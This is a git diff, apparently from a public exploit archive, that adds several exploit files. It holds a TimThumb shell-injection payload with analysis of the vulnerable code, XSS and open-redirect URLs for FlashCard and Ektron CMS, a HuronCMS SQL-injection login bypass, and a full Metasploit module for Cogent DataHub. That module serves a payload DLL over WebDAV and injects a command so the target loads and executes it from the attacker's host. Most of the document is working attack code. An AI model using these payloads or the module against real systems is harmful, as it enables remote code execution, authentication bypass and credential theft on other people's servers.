+HTTP/1.1 400 Bad Request
+Date: Tue, 24 Jun 2014 07:20:48 GMT
+Server: Apache
+X-Powered-By: PHP/5.5.9-1ubuntu4
+X-Content-Type-Options: nosniff
+X-Frame-Options: sameorigin
+Content-Length: 3059
+Connection: close
+Content-Type: text/html
+
+…
+<a href='http://www.php.net/function.getimagesize'
+target='_new'>getimagesize</a>
+(  )</td><td
+title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php'
+bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr>
+</table></font>
+<h1>A WordThumb error has occured</h1>The following error(s) occured:<br
+/><ul><li>The image being resized is not a valid gif, jpg or
+png.</li></ul><br /><br />Query String : webshot=1&src=
+http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version :
+1.07</pre>
+
+Even it response with error messages but injected OS command has already
+been executed.
+
+$ ls /tmp/longcat -lha
+- -rw-r--r-- 1 www-data www-data 0 ??.?.  24 14:20 /tmp/longcat
+
+
+[+] Vulnerability Analysis
+============================================================
+https://timthumb.googlecode.com/svn/trunk/timthumb.php
+
+Filename: timthumb.php
+
+if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true);
+if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT',
+'/usr/local/bin/CutyCapt');
+if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run');
+...
+timthumb::start(); ? start script
+...
+public static function start(){
+$tim = new timthumb(); ? create timthumb object, call __construct()
+...
+$tim->run();
+...
+public function __construct(){
+...
+$this->src = $this->param('src'); ? set "src" variable to HTTP GET "src"
+parameter
+…
+if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){
+...
+$this->isURL = true; ? prefix http/s result in isURL = true
+}
+...
+
+protected function param($property, $default = ''){
+if (isset ($_GET[$property])) {
+return $_GET[$property];
+...
+
+public function run(){
+if($this->isURL){
+...
+if($this->param('webshot')){ ? HTTP GET "webshot" must submitted
+if(WEBSHOT_ENABLED){ ? this pre-defined constant must be true
+...
+$this->serveWebshot(); ? call webshot feature
+} else {
+...
+
+protected function serveWebshot(){
+...
+if(! is_file(WEBSHOT_CUTYCAPT)){ ? check existing of cutycapt
+return $this->error("CutyCapt is not installed. $instr");
+}
+if(! is_file(WEBSHOT_XVFB)){ ? check existing of xvfb
+return $this->Error("Xvfb is not installed. $instr");
+}
+...
+$url = $this->src;
+if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ? check valid
+URL #LoL
+return $this->error("Invalid URL supplied.");
+}
+$url =
+preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/',
+'', $url);  ? check valid URL as specified in RFC 3986
+http://www.ietf.org/rfc/rfc3986.txt
+...
+if(WEBSHOT_XVFB_RUNNING){
+putenv('DISPLAY=:100.0');
+$command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\"
+--javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
+--js-can-open-windows=off --url=\"$url\" --out-format=$format
+--out=$tempfile"; ? OS shell command injection
+} else {
+$command = "$xv --server-args=\"-screen 0,
+{$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout
+--user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
+--js-can-open-windows=off --url=\"$url\" --out-format=$format
+--out=$tempfile"; ? OS shell command injection
+}
+...
+$out = `$command`;  ? execute $command as shell command
+
+"PHP supports one execution operator: backticks (``). Note that these are
+not single-quotes! PHP will attempt to execute the contents of the
+backticks as a shell command." -
+http://www.php.net//manual/en/language.operators.execution.php
+
+"$url" is failed to escape "$()" in "$command" which is result in arbitrary
+code execution.
diff --git a/platforms/php/webapps/33870.txt b/platforms/php/webapps/33870.txt
new file mode 100755
index 000000000..7f7c23603
--- /dev/null
+++ b/platforms/php/webapps/33870.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/39648/info
+
+FlashCard is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+FlashCard 2.6.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/flashcard/stateless/cPlayer.php?id="><iframe
+src=http://www.google.de
\ No newline at end of file
diff --git a/platforms/php/webapps/33874.txt b/platforms/php/webapps/33874.txt
new file mode 100755
index 000000000..8e2055c7e
--- /dev/null
+++ b/platforms/php/webapps/33874.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/39679/info
+
+Ektron CMS400.NET is prone to multiple security vulnerabilities, including multiple cross-site scripting issues, an information-disclosure issue, a cookie-manipulation issue, a directory-traversal issue, a security-bypass issue, and a URI redirection issue.
+
+Attackers can leverage these issues to bypass authentication mechanisms, execute arbitrary script code in the browser of an unsuspecting user in the context of an affected site, steal cookie-based authentication credentials, obtain sensitive information, bypass certain security restrictions, and redirect a user to a potentially malicious site; other attacks are also possible.
+
+Ektron CMS400.NET 7.5.2.49 is affected; other versions may also be vulnerable. 
+
+The following example URIs are available:
+
+Cross-Site Scripting issue:
+
+http://www.example.com/WorkArea/reterror.aspx?info=<script>alert('vulnerable')</script>
+http://www.example.com/workarea/medialist.aspx?action=ViewLibraryByCategory&selectids='; alert('Vulnerable');//
+
+URI Redirection issue:
+
+http://www.example.com/workarea/blankredirect.aspx?http://www.example2.com 
\ No newline at end of file
diff --git a/platforms/php/webapps/33875.txt b/platforms/php/webapps/33875.txt
new file mode 100755
index 000000000..43ab426fa
--- /dev/null
+++ b/platforms/php/webapps/33875.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/39685/info
+
+HuronCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Huron CMS 8 11 2007 is vulnerable; other versions may also be affected. 
+
+The following example data are available:
+
+Username: 'or 1=1/*
+Password: 'or 1=1/* 
\ No newline at end of file
diff --git a/platforms/windows/remote/33880.rb b/platforms/windows/remote/33880.rb
new file mode 100755
index 000000000..84a43e341
--- /dev/null
+++ b/platforms/windows/remote/33880.rb
@@ -0,0 +1,448 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  # Exploitation is reliable, but the service hangs and needs manual restarting.
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
+
+  def initialize
+    super(
+      'Name'          => 'Cogent DataHub Command Injection',
+      'Description'   => %q{
+        This module exploits an injection vulnerability in Cogent DataHub prior
+        to 7.3.5. The vulnerability exists in the GetPermissions.asp page, which
+        makes insecure use of the datahub_command function with user controlled
+        data, allowing execution of arbitrary datahub commands and scripts. This
+        module has been tested successfully with Cogent DataHub 7.3.4 on
+        Windows 7 SP1.
+      },
+      'Author'      => [
+        'John Leitch', # Vulnerability discovery
+        'juan vazquez' # Metasploit module
+      ],
+      'Platform'    => 'win',
+      'References'  =>
+        [
+          ['ZDI', '14-136'],
+          ['CVE', '2014-3789'],
+          ['BID', '67486']
+        ],
+      'Stance'      => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' => {
+        'WfsDelay' => 30,
+        'InitialAutoRunScript' => 'migrate -f'
+      },
+      'Targets'     =>
+        [
+          [ 'Cogent DataHub < 7.3.5', { } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 29 2014'
+    )
+    register_options(
+      [
+        OptString.new('URIPATH',   [ true,  'The URI to use (do not change)', '/']),
+        OptPort.new('SRVPORT',     [ true,  'The daemon port to listen on ' + 
+                                                      '(do not change)', 80 ]),
+        OptInt.new('WEBDAV_DELAY', [ true,  'Time that the HTTP Server will ' +
+                                          'wait for the payload request', 20]),
+        OptString.new('UNCPATH',   [ false, 'Override the UNC path to use.' ])
+      ], self.class)
+  end
+
+  def autofilter
+    false
+  end
+
+  def on_request_uri(cli, request)
+    case request.method
+      when 'OPTIONS'
+        process_options(cli, request)
+      when 'PROPFIND'
+        process_propfind(cli, request)
+      when 'GET'
+        process_get(cli, request)
+      else
+        vprint_status("#{request.method} => 404 (#{request.uri})")
+        resp = create_response(404, "Not Found")
+        resp.body = ""
+        resp['Content-Type'] = 'text/html'
+        cli.send_response(resp)
+    end
+  end
+
+  def process_get(cli, request)
+
+    if blacklisted_path?(request.uri)
+      vprint_status("GET => 404 [BLACKLIST] (#{request.uri})")
+      resp = create_response(404, "Not Found")
+      resp.body = ""
+      cli.send_response(resp)
+      return
+    end
+
+    if request.uri.include?(@basename)
+      print_status("GET => Payload")
+      return if ((p = regenerate_payload(cli)) == nil)
+      data = generate_payload_dll({ :code => p.encoded })
+      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+      return
+    end
+
+    # Treat index.html specially
+    if (request.uri[-1,1] == "/" or request.uri =~ /index\.html?$/i)
+      vprint_status("GET => REDIRECT (#{request.uri})")
+      resp = create_response(200, "OK")
+
+      resp.body  = %Q|<html><head><meta http-equiv="refresh" content="0;URL=|
+      resp.body += %Q|#{@exploit_unc}#{@share_name}\\"></head><body></body></html>|
+      resp['Content-Type'] = 'text/html'
+      cli.send_response(resp)
+      return
+    end
+
+    # Anything else is probably a request for a data file...
+    vprint_status("GET => DATA (#{request.uri})")
+    data = rand_text_alpha(4 + rand(4))
+    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+  end
+
+  #
+  # OPTIONS requests sent by the WebDav Mini-Redirector
+  #
+  def process_options(cli, request)
+    vprint_status("OPTIONS #{request.uri}")
+    headers = {
+      'MS-Author-Via' => 'DAV',
+      'DASL'          => '<DAV:sql>',
+      'DAV'           => '1, 2',
+      'Allow'         => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY,' +
+                    + ' MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
+      'Public'        => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, ' +
+                    + 'LOCK, UNLOCK',
+      'Cache-Control' => 'private'
+    }
+    resp = create_response(207, "Multi-Status")
+    headers.each_pair {|k,v| resp[k] = v }
+    resp.body = ""
+    resp['Content-Type'] = 'text/xml'
+    cli.send_response(resp)
+  end
+
+  #
+  # PROPFIND requests sent by the WebDav Mini-Redirector
+  #
+  def process_propfind(cli, request)
+    path = request.uri
+    vprint_status("PROPFIND #{path}")
+
+    if path !~ /\/$/
+
+      if blacklisted_path?(path)
+        vprint_status "PROPFIND => 404 (#{path})"
+        resp = create_response(404, "Not Found")
+        resp.body = ""
+        cli.send_response(resp)
+        return
+      end
+
+      if path.index(".")
+        vprint_status "PROPFIND => 207 File (#{path})"
+        body = %Q|<?xml version="1.0" encoding="utf-8"?>
+<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
+<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
+<D:href>#{path}</D:href>
+<D:propstat>
+<D:prop>
+<lp1:resourcetype/>
+<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
+<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>
+<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
+<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
+<lp2:executable>T</lp2:executable>
+<D:supportedlock>
+<D:lockentry>
+<D:lockscope><D:exclusive/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+<D:lockentry>
+<D:lockscope><D:shared/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+</D:supportedlock>
+<D:lockdiscovery/>
+<D:getcontenttype>application/octet-stream</D:getcontenttype>
+</D:prop>
+<D:status>HTTP/1.1 200 OK</D:status>
+</D:propstat>
+</D:response>
+</D:multistatus>
+|
+        # send the response
+        resp = create_response(207, "Multi-Status")
+        resp.body = body
+        resp['Content-Type'] = 'text/xml; charset="utf8"'
+        cli.send_response(resp)
+        return
+      else
+        vprint_status "PROPFIND => 301 (#{path})"
+        resp = create_response(301, "Moved")
+        resp["Location"] = path + "/"
+        resp['Content-Type'] = 'text/html'
+        cli.send_response(resp)
+        return
+      end
+    end
+
+    vprint_status "PROPFIND => 207 Directory (#{path})"
+    body = %Q|<?xml version="1.0" encoding="utf-8"?>
+<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
+  <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
+    <D:href>#{path}</D:href>
+    <D:propstat>
+      <D:prop>
+        <lp1:resourcetype><D:collection/></lp1:resourcetype>
+        <lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
+        <lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
+        <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
+        <D:supportedlock>
+          <D:lockentry>
+            <D:lockscope><D:exclusive/></D:lockscope>
+            <D:locktype><D:write/></D:locktype>
+          </D:lockentry>
+          <D:lockentry>
+            <D:lockscope><D:shared/></D:lockscope>
+            <D:locktype><D:write/></D:locktype>
+          </D:lockentry>
+        </D:supportedlock>
+        <D:lockdiscovery/>
+        <D:getcontenttype>httpd/unix-directory</D:getcontenttype>
+      </D:prop>
+    <D:status>HTTP/1.1 200 OK</D:status>
+  </D:propstat>
+</D:response>
+|
+
+    if request["Depth"].to_i > 0
+      trail = path.split("/")
+      trail.shift
+      case trail.length
+        when 0
+          body << generate_shares(path)
+        when 1
+          body << generate_files(path)
+      end
+    else
+      vprint_status "PROPFIND => 207 Top-Level Directory"
+    end
+
+    body << "</D:multistatus>"
+
+    body.gsub!(/\t/, '')
+
+    # send the response
+    resp = create_response(207, "Multi-Status")
+    resp.body = body
+    resp['Content-Type'] = 'text/xml; charset="utf8"'
+    cli.send_response(resp)
+  end
+
+  def generate_shares(path)
+    share_name = @share_name
+    %Q|
+<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
+<D:href>#{path}#{share_name}/</D:href>
+<D:propstat>
+<D:prop>
+<lp1:resourcetype><D:collection/></lp1:resourcetype>
+<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
+<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
+<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
+<D:supportedlock>
+<D:lockentry>
+<D:lockscope><D:exclusive/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+<D:lockentry>
+<D:lockscope><D:shared/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+</D:supportedlock>
+<D:lockdiscovery/>
+<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
+</D:prop>
+<D:status>HTTP/1.1 200 OK</D:status>
+</D:propstat>
+</D:response>
+|
+  end
+
+  def generate_files(path)
+    trail = path.split("/")
+    return "" if trail.length < 2
+
+    base  = @basename
+    exts  = @extensions.gsub(",", " ").split(/\s+/)
+    files = ""
+    exts.each do |ext|
+      files << %Q|
+<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
+<D:href>#{path}#{base}.#{ext}</D:href>
+<D:propstat>
+<D:prop>
+<lp1:resourcetype/>
+<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
+<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>
+<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
+<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
+<lp2:executable>T</lp2:executable>
+<D:supportedlock>
+<D:lockentry>
+<D:lockscope><D:exclusive/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+<D:lockentry>
+<D:lockscope><D:shared/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+</D:supportedlock>
+<D:lockdiscovery/>
+<D:getcontenttype>application/octet-stream</D:getcontenttype>
+</D:prop>
+<D:status>HTTP/1.1 200 OK</D:status>
+<D:ishidden b:dt="boolean">1</D:ishidden>
+</D:propstat>
+</D:response>
+|
+    end
+
+    files
+  end
+
+  def gen_timestamp(ttype=nil)
+    ::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT")
+  end
+
+  def gen_datestamp(ttype=nil)
+    ::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ")
+  end
+
+  # This method rejects requests that are known to break exploitation
+  def blacklisted_path?(uri)
+    share_path = "/#{@share_name}"
+    payload_path = "#{share_path}/#{@basename}.dll"
+    case uri
+      when payload_path
+        return false
+      when share_path
+        return false
+      else
+        return true
+    end
+  end
+
+  def check
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'),
+      'vars_post' =>
+        {
+          'username' => rand_text_alpha(4 + rand(4)),
+          'password' => rand_text_alpha(4 + rand(4))
+        }
+      })
+
+    if res && res.code == 200 && res.body =~ /PermissionRecord/
+        return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def send_injection(dll)
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'),
+      'vars_post' =>
+        {
+          'username' => rand_text_alpha(3 + rand(3)),
+          'password' => "#{rand_text_alpha(3 + rand(3))}\")" + 
+                        "(load_plugin \"#{dll}\" 1)(\""
+        }
+      }, 1)
+
+    res
+  end
+
+  def on_new_session(session)
+    if service
+      service.stop
+    end
+
+    super
+  end
+
+  def primer
+    print_status("#{peer} - Sending injection...")
+    res = send_injection("\\\\\\\\#{@myhost}\\\\#{@share_name}\\\\#{@basename}.dll")
+    if res
+      print_error("#{peer} - Unexpected answer")
+    end
+  end
+
+  def exploit
+    if datastore['UNCPATH'].blank?
+      @basename = rand_text_alpha(3)
+      @share_name = rand_text_alpha(3)
+      @extensions = "dll"
+      @system_commands_file = rand_text_alpha_lower(4)
+
+      if (datastore['SRVHOST'] == '0.0.0.0')
+        @myhost = Rex::Socket.source_address('50.50.50.50')
+      else
+        @myhost = datastore['SRVHOST']
+      end
+
+      @exploit_unc  = "\\\\#{@myhost}\\"
+
+      if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
+        fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and ' + 
+                  'URIPATH=/')
+      end
+
+      print_status("Starting Shared resource at #{@exploit_unc}#{@share_name}" +
+                    "\\#{@basename}.dll")
+
+      begin
+        # The Windows Webclient needs some time...
+        Timeout.timeout(datastore['WEBDAV_DELAY']) { super }
+      rescue ::Timeout::Error
+        service.stop if service
+      end
+    else
+      # Using external SMB Server
+      if datastore['UNCPATH'] =~ /\\\\([^\\]*)\\([^\\]*)\\([^\\]*\.dll)/
+        host = $1
+        share_name = $2
+        dll_name = $3
+        print_status("#{peer} - Sending injection...")
+        res = send_injection("\\\\\\\\#{host}\\\\#{share_name}\\\\#{dll_name}")
+        if res
+          print_error("#{peer} - Unexpected answer")
+        end
+      else
+        fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be ' + 
+                  '\\\\host\\shared_folder\\base_name.dll')
+      end
+    end
+  end
+
+end
\ No newline at end of file